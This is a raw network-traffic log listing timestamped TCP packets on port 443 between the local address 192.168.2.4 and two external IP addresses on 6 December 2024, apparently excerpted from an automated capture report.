                                                                                                                                                                                    Dec 6, 2024 09:42:20.267627001 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.267637014 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.280916929 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.280956030 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.280966043 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.294495106 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.294550896 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.294562101 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.307142019 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.307183981 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.307193041 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.319581985 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.319637060 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.319643974 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.331181049 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.331232071 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.331248999 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.342919111 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.342977047 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.342983961 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.353286982 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.353339911 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.353347063 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.363425970 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.363472939 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.363477945 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.372980118 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.373033047 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.373040915 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.382360935 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.382427931 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.382436991 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.391645908 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.391700029 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.391706944 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.402297020 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.402359009 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.402364969 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.409817934 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.409858942 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.409866095 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.418243885 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.418292046 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.418299913 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.426780939 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.426834106 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.426840067 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.435427904 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.435473919 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.435482025 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.443816900 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.443869114 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.443876028 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.452384949 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.452429056 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.452435970 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.463196993 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.463241100 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.463249922 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.466836929 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.466886997 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.466892958 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.473001003 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.473053932 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.473062038 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.478831053 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.478878975 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.478890896 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.484729052 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.484775066 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.484782934 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.490689039 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.490737915 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.490746975 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.496572971 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.496623039 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.496629953 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.502548933 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.502594948 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.502603054 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.511404991 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.511456013 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.511462927 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.523500919 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.523552895 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.523560047 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.524867058 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.524910927 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.524915934 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.534209967 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.534257889 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.534265041 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.534977913 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.535027027 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.535032034 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537445068 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537496090 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537501097 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537519932 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537566900 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537646055 CET49838443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:20.537662983 CET44349838172.217.21.36192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:21.686242104 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:21.686264992 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:21.686342955 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:21.686722994 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:21.686737061 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:22.798031092 CET49844443192.168.2.4172.217.21.36
                                                                                                                                                                                    Dec 6, 2024 09:42:23.085576057 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:23.085634947 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:23.086256027 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:23.086267948 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:23.088406086 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:23.088411093 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:23.176829100 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:23.176866055 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:23.176949978 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:23.177280903 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:23.177290916 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.123018980 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.123085976 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.123096943 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.123140097 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.124532938 CET49859443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.124556065 CET443498595.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.190195084 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.190232992 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.190524101 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.190817118 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.190824986 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.573241949 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.573362112 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.573985100 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.573992968 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576721907 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576721907 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576730013 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576740980 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576765060 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576770067 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576819897 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576831102 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576841116 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576847076 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576875925 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576884985 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576932907 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576940060 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576948881 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576956987 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576968908 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.576992035 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577003002 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577008963 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577025890 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577033043 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577042103 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577044964 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577115059 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577121019 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577128887 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577136040 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577136993 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577146053 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577356100 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577377081 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577393055 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577399015 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577399969 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577404976 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577406883 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577413082 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577424049 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577428102 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577491999 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577497959 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:24.577502966 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:24.619344950 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.589484930 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.589776993 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.591250896 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.591258049 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592046022 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592051029 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592160940 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592179060 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592206955 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592211008 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592325926 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592348099 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592550039 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:25.592575073 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:26.448009014 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:26.448110104 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:26.448216915 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:26.449485064 CET49866443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:26.449503899 CET443498665.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:26.549789906 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:26.549844980 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:26.549920082 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:26.550163984 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:26.550174952 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.073534966 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.073601961 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.073735952 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.074683905 CET49872443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.074701071 CET443498725.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.552963972 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.553018093 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.553214073 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.553499937 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.553517103 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.947664976 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.947834969 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.948535919 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.948548079 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950381994 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950391054 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950460911 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950472116 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950483084 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950486898 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950551033 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950560093 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950567007 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950570107 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950676918 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950740099 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950803995 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950810909 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950855017 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950872898 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950876951 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950896978 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950980902 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.950992107 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.951005936 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.951018095 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.951091051 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.951091051 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:27.951102018 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:27.951111078 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:28.950819016 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:28.950983047 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:28.951505899 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:28.951520920 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:28.953819036 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:28.953833103 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.683490038 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.683557034 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.683568001 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.683585882 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.683609962 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.683635950 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.684745073 CET49878443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.684766054 CET443498785.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.992218971 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.992288113 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.992319107 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.992332935 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:29.992363930 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.992384911 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.993253946 CET49879443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:29.993271112 CET443498795.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:30.597117901 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:30.597146988 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:30.597251892 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:30.597546101 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:30.597553968 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:31.609288931 CET49891443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:31.609330893 CET443498915.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:31.609431982 CET49891443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:31.609721899 CET49891443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:31.609741926 CET443498915.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.011352062 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.011444092 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.012126923 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.012137890 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.013993025 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014005899 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014035940 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014050961 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014074087 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014080048 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014137030 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014166117 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014172077 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014182091 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014271975 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014302015 CET443498905.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014394999 CET49890443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:32.014400959 CET443498905.75.212.196192.168.2.4
